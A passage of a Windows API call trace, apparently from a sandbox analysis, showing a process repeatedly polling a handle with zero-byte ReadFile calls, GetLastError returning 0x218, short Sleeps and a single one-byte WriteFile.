	[0202.957] GetLastError () returned 0x218
	[0202.957] Sleep (dwMilliseconds=0xa) 
	[0202.972] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.972] GetLastError () returned 0x218
	[0202.972] Sleep (dwMilliseconds=0xa) 
	[0202.991] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0202.991] GetLastError () returned 0x218
	[0202.991] Sleep (dwMilliseconds=0xa) 
	[0203.004] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.004] GetLastError () returned 0x218
	[0203.004] Sleep (dwMilliseconds=0xa) 
	[0203.019] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.019] GetLastError () returned 0x218
	[0203.019] Sleep (dwMilliseconds=0xa) 
	[0203.069] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.069] GetLastError () returned 0x218
	[0203.069] Sleep (dwMilliseconds=0xa) 
	[0203.120] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.120] GetLastError () returned 0x218
	[0203.120] Sleep (dwMilliseconds=0xa) 
	[0203.141] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.141] GetLastError () returned 0x218
	[0203.141] Sleep (dwMilliseconds=0xa) 
	[0203.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.144] GetLastError () returned 0x218
	[0203.144] Sleep (dwMilliseconds=0xa) 
	[0203.160] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.160] GetLastError () returned 0x218
	[0203.160] Sleep (dwMilliseconds=0xa) 
	[0203.175] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.175] GetLastError () returned 0x218
	[0203.176] Sleep (dwMilliseconds=0xa) 
	[0203.191] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.191] GetLastError () returned 0x218
	[0203.191] Sleep (dwMilliseconds=0xa) 
	[0203.206] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.206] GetLastError () returned 0x218
	[0203.206] Sleep (dwMilliseconds=0xa) 
	[0203.222] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.222] GetLastError () returned 0x218
	[0203.222] Sleep (dwMilliseconds=0xa) 
	[0203.237] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.237] GetLastError () returned 0x218
	[0203.237] Sleep (dwMilliseconds=0xa) 
	[0203.287] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.287] GetLastError () returned 0x218
	[0203.287] Sleep (dwMilliseconds=0xa) 
	[0203.332] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.332] GetLastError () returned 0x218
	[0203.332] Sleep (dwMilliseconds=0xa) 
	[0203.348] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0203.348] GetLastError () returned 0x218
	[0203.348] Sleep (dwMilliseconds=0x3e8) 
	[0204.378] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0204.378] Sleep (dwMilliseconds=0xa) 
	[0204.424] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.424] GetLastError () returned 0x218
	[0204.424] Sleep (dwMilliseconds=0xa) 
	[0204.449] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.449] GetLastError () returned 0x218
	[0204.449] Sleep (dwMilliseconds=0xa) 
	[0204.455] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.455] GetLastError () returned 0x218
	[0204.455] Sleep (dwMilliseconds=0xa) 
	[0204.470] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.470] GetLastError () returned 0x218
	[0204.470] Sleep (dwMilliseconds=0xa) 
	[0204.485] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.485] GetLastError () returned 0x218
	[0204.485] Sleep (dwMilliseconds=0xa) 
	[0204.501] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.501] GetLastError () returned 0x218
	[0204.501] Sleep (dwMilliseconds=0xa) 
	[0204.517] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.517] GetLastError () returned 0x218
	[0204.517] Sleep (dwMilliseconds=0xa) 
	[0204.533] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.533] GetLastError () returned 0x218
	[0204.533] Sleep (dwMilliseconds=0xa) 
	[0204.548] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.548] GetLastError () returned 0x218
	[0204.548] Sleep (dwMilliseconds=0xa) 
	[0204.597] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.597] GetLastError () returned 0x218
	[0204.597] Sleep (dwMilliseconds=0xa) 
	[0204.641] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.641] GetLastError () returned 0x218
	[0204.642] Sleep (dwMilliseconds=0xa) 
	[0204.688] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.688] GetLastError () returned 0x218
	[0204.688] Sleep (dwMilliseconds=0xa) 
	[0204.704] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.704] GetLastError () returned 0x218
	[0204.704] Sleep (dwMilliseconds=0xa) 
	[0204.721] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.722] GetLastError () returned 0x218
	[0204.722] Sleep (dwMilliseconds=0xa) 
	[0204.735] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.735] GetLastError () returned 0x218
	[0204.735] Sleep (dwMilliseconds=0xa) 
	[0204.751] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.751] GetLastError () returned 0x218
	[0204.751] Sleep (dwMilliseconds=0xa) 
	[0204.767] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.767] GetLastError () returned 0x218
	[0204.767] Sleep (dwMilliseconds=0xa) 
	[0204.782] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.782] GetLastError () returned 0x218
	[0204.782] Sleep (dwMilliseconds=0xa) 
	[0204.798] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.798] GetLastError () returned 0x218
	[0204.798] Sleep (dwMilliseconds=0xa) 
	[0204.847] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.847] GetLastError () returned 0x218
	[0204.847] Sleep (dwMilliseconds=0xa) 
	[0204.891] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.891] GetLastError () returned 0x218
	[0204.891] Sleep (dwMilliseconds=0xa) 
	[0204.909] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.909] GetLastError () returned 0x218
	[0204.909] Sleep (dwMilliseconds=0xa) 
	[0204.922] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.922] GetLastError () returned 0x218
	[0204.922] Sleep (dwMilliseconds=0xa) 
	[0204.939] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.939] GetLastError () returned 0x218
	[0204.939] Sleep (dwMilliseconds=0xa) 
	[0204.954] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.954] GetLastError () returned 0x218
	[0204.954] Sleep (dwMilliseconds=0xa) 
	[0204.969] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.969] GetLastError () returned 0x218
	[0204.970] Sleep (dwMilliseconds=0xa) 
	[0204.985] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0204.985] GetLastError () returned 0x218
	[0204.985] Sleep (dwMilliseconds=0xa) 
	[0205.034] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.034] GetLastError () returned 0x218
	[0205.034] Sleep (dwMilliseconds=0xa) 
	[0205.079] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.079] GetLastError () returned 0x218
	[0205.079] Sleep (dwMilliseconds=0xa) 
	[0205.125] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.125] GetLastError () returned 0x218
	[0205.125] Sleep (dwMilliseconds=0xa) 
	[0205.148] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.148] GetLastError () returned 0x218
	[0205.148] Sleep (dwMilliseconds=0xa) 
	[0205.156] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.156] GetLastError () returned 0x218
	[0205.156] Sleep (dwMilliseconds=0xa) 
	[0205.172] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.172] GetLastError () returned 0x218
	[0205.172] Sleep (dwMilliseconds=0xa) 
	[0205.188] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.188] GetLastError () returned 0x218
	[0205.188] Sleep (dwMilliseconds=0xa) 
	[0205.203] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.203] GetLastError () returned 0x218
	[0205.203] Sleep (dwMilliseconds=0xa) 
	[0205.219] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.219] GetLastError () returned 0x218
	[0205.219] Sleep (dwMilliseconds=0xa) 
	[0205.245] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.245] GetLastError () returned 0x218
	[0205.245] Sleep (dwMilliseconds=0xa) 
	[0205.250] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.250] GetLastError () returned 0x218
	[0205.250] Sleep (dwMilliseconds=0xa) 
	[0205.297] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.297] GetLastError () returned 0x218
	[0205.297] Sleep (dwMilliseconds=0xa) 
	[0205.344] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.344] GetLastError () returned 0x218
	[0205.344] Sleep (dwMilliseconds=0xa) 
	[0205.359] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.359] GetLastError () returned 0x218
	[0205.359] Sleep (dwMilliseconds=0xa) 
	[0205.375] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.375] GetLastError () returned 0x218
	[0205.375] Sleep (dwMilliseconds=0xa) 
	[0205.390] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.390] GetLastError () returned 0x218
	[0205.390] Sleep (dwMilliseconds=0xa) 
	[0205.406] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.406] GetLastError () returned 0x218
	[0205.406] Sleep (dwMilliseconds=0xa) 
	[0205.422] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.422] GetLastError () returned 0x218
	[0205.422] Sleep (dwMilliseconds=0xa) 
	[0205.437] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.437] GetLastError () returned 0x218
	[0205.437] Sleep (dwMilliseconds=0xa) 
	[0205.453] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.453] GetLastError () returned 0x218
	[0205.453] Sleep (dwMilliseconds=0xa) 
	[0205.502] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.502] GetLastError () returned 0x218
	[0205.502] Sleep (dwMilliseconds=0xa) 
	[0205.546] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.546] GetLastError () returned 0x218
	[0205.546] Sleep (dwMilliseconds=0xa) 
	[0205.569] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.569] GetLastError () returned 0x218
	[0205.569] Sleep (dwMilliseconds=0xa) 
	[0205.578] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.578] GetLastError () returned 0x218
	[0205.578] Sleep (dwMilliseconds=0xa) 
	[0205.593] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.593] GetLastError () returned 0x218
	[0205.593] Sleep (dwMilliseconds=0xa) 
	[0205.623] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.623] GetLastError () returned 0x218
	[0205.623] Sleep (dwMilliseconds=0xa) 
	[0205.628] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.628] GetLastError () returned 0x218
	[0205.628] Sleep (dwMilliseconds=0xa) 
	[0205.641] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.641] GetLastError () returned 0x218
	[0205.641] Sleep (dwMilliseconds=0xa) 
	[0205.656] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.656] GetLastError () returned 0x218
	[0205.656] Sleep (dwMilliseconds=0xa) 
	[0205.671] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.671] GetLastError () returned 0x218
	[0205.671] Sleep (dwMilliseconds=0xa) 
	[0205.721] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.721] GetLastError () returned 0x218
	[0205.721] Sleep (dwMilliseconds=0xa) 
	[0205.765] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.765] GetLastError () returned 0x218
	[0205.765] Sleep (dwMilliseconds=0xa) 
	[0205.783] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.783] GetLastError () returned 0x218
	[0205.783] Sleep (dwMilliseconds=0xa) 
	[0205.796] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0205.796] GetLastError () returned 0x218
	[0205.796] Sleep (dwMilliseconds=0xa) 
